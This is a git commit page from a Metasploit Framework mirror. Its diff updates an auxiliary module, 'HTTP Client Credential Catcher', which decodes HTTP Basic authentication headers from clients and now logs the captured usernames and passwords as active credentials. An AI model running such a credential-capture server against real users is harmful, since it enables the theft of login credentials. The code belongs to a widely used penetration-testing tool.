infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updating HTTP Basic capture mod with edits based on MSF team suggestions

unstable
saint patrick 2012-08-19 19:47:01 -05:00
parent de380cfb46
commit 10698e2f99
1 changed files with 14 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/auxiliary/server/capture/http_basic.rb
View File

@ -6,7 +6,6 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'HTTP Client Credential Catcher',
@ -97,6 +96,16 @@ class Metasploit3 < Msf::Auxiliary
basic,auth = req['Authorization'].split(/\s+/)
user,pass = Rex::Text.decode_base64(auth).split(':', 2)
report_auth_info(
:host => cli.peerhost,
:port => datastore['SRVPORT'],
:sname => 'HTTP',
:user => user,
:pass => pass,
:source_type => "captured",
:active => true
)
print_status("HTTP LOGIN #{cli.peerhost} > :#{@myport} #{user} / #{pass} => #{req.resource}")
else
data = %Q^